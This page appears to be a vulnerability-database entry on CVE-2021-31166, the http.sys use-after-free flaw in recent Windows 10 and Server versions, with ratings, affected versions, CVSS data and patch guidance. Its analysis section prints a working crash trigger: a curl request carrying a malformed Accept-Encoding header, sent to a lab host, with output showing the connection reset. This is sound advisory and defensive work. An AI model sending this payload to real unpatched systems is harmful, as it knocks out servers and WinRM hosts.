Attacker Value
High
(3 users assessed)
Exploitability
High
(3 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
8

CVE-2021-31166

Disclosure Date: May 11, 2021
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Initial Access
Techniques
Validation
Validated
Lateral Movement
Techniques
Validation
Validated

Description

HTTP Protocol Stack Remote Code Execution Vulnerability

Add Assessment

5
Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

The vulnerability only affects newer versions of Windows 10 / Server. Version 20H2 and 2004 of Windows 10 and Windows Server Core installations are affected according to the Microsoft Advisory.

The semi-annual channel versions are not that common in bigger organisations. This affected my rating on attacker value. I would argue , that most of them use the LTSC of older Windows versions. The attacker value is not very low, because the vulnerability has the potential of being used for lateral movement in a computer worm. So this might still be relevant to use in smaller organisations.

Microsoft rates this vulnerability “Exploitation more likely”. This means that exploitation would be reliable and Microsoft ist aware of exploits in past for similar vulnerabilities. This affected my Exploitability scoring towards Easy on this vulnerability.

Sources:

https://twitter.com/GossiTheDog/status/1392211087601410054
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

According to Microsoft’s documentation, here are the affected platforms:

Windows Server, version 2004 (or 20H1) (Server Core installation),
Windows 10 Version 2004 (or 20H1) for ARM64/x64/32-bit Systems,
Windows Server, version 20H2 (Server Core Installation),
Windows 10 Version 20H2 for ARM64/x64/32-bit Systems.

CVE-2021-31166

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • microsoft

Products

  • windows 10 2004,
  • windows 10 20h2,
  • windows server 2004,
  • windows server 20h2

Exploited in the Wild

Reported by:

Additional Info

Technical Analysis

Description

On Tuesday, May 11, 2021, as part of their May Patch Tuesday advisory release, Microsoft published information on CVE-2021-31166, a high-severity remote code execution vulnerability in the Windows HTTP protocol stack. Successful exploitation requires a remote, unauthenticated attacker to send a specially crafted packet to a target server that uses the HTTP Protocol Stack (http.sys) to process packets. Microsoft noted in their advisory that the vulnerability, which carries a CVSSv3 base score of 9.8, has the potential to be wormed (as many protocol vulnerabilities have potential to be).

Public proof-of-concept (PoC) exploit code that crashes a vulnerable target (but does not achieve remote code execution) has been available since May 16, 2021.

Affected products

Early information indicated that only the most recent versions of Windows were vulnerable and primarily affected web server implementations of http.sys. On Friday, May 21, 2021, however, security community members noted that Windows Remote Management, or WinRM, is also vulnerable due to its use of the http.sys driver. On Saturday, May 22, 2021, Windows 10 21H1 was also reported as being vulnerable. Later in the day, it was further noted that any servers running with the Microsoft-HTTPAPI/2.0 header may be vulnerable.

  • Windows 10 Version 21H1
  • Windows Server, version 20H2 (Server Core Installation)
  • Windows 10 Version 20H2 for ARM64-based Systems
  • Windows 10 Version 20H2 for 32-bit Systems
  • Windows 10 Version 20H2 for x64-based Systems
  • Windows Server, version 2004 (Server Core installation)
  • Windows 10 Version 2004 for x64-based Systems
  • Windows 10 Version 2004 for ARM64-based Systems
  • Windows 10 Version 2004 for 32-bit Systems

Rapid7 analysis

CVE-2021-31166 is a use-after-free (memory corruption) vulnerability whose exploitation requires manipulation of kernel memory. The realization that more Windows 10 implementations beyond IIS are vulnerable raises the alarm level slightly given the expanded attack surface area; however, reliable weaponization of CVE-2021-31166 for code execution is non-trivial, and exploitation for code execution is unlikely to occur quickly (and even less likely to occur quickly at scale). With that said, the risk is worth taking seriously for those running on more recent Windows update streams: The time between vulnerability disclosure and reliable attacks has decreased significantly over the past year, and defenders are detecting a comparatively high proportion of attacks perpetrated by sophisticated adversaries.

Rapid7 researchers were able to reproduce a crash against a Windows 10 target configured as a web server and as a WinRM-enabled host (shown below).

wvu@kharak:~$ curl -v http://192.168.56.4:5985/ -H "Accept-Encoding: does-not-exist,"
*   Trying 192.168.56.4...
* TCP_NODELAY set
* Connected to 192.168.56.4 (192.168.56.4) port 5985 (#0)
> GET / HTTP/1.1
> Host: 192.168.56.4:5985
> User-Agent: curl/7.64.1
> Accept: */*
> Accept-Encoding: does-not-exist,
>
< HTTP/1.1 404 Not Found
< Content-Type: text/html; charset=us-ascii
< Server: Microsoft-HTTPAPI/2.0
< Date: Fri, 21 May 2021 20:48:16 GMT
< Connection: close
< Content-Length: 315
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Not Found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Not Found</h2>
<hr><p>HTTP Error 404. The requested resource is not found.</p>
</BODY></HTML>
* Closing connection 0
wvu@kharak:~$ curl -v http://192.168.56.4:5985/ -H "Accept-Encoding: does-not-exist,,"
*   Trying 192.168.56.4...
* TCP_NODELAY set
* Connected to 192.168.56.4 (192.168.56.4) port 5985 (#0)
> GET / HTTP/1.1
> Host: 192.168.56.4:5985
> User-Agent: curl/7.64.1
> Accept: */*
> Accept-Encoding: does-not-exist,,
>
* Recv failure: Connection reset by peer
* Closing connection 0
curl: (56) Recv failure: Connection reset by peer
wvu@kharak:~$

When a malformed Accept-Encoding header is sent in the request, the target immediately crashes, and the connection is reset.

Guidance

KB5003173 provides guidance on patching CVE-2021-31166. Patches may be downloaded directly from the Microsoft Update Catalog.

References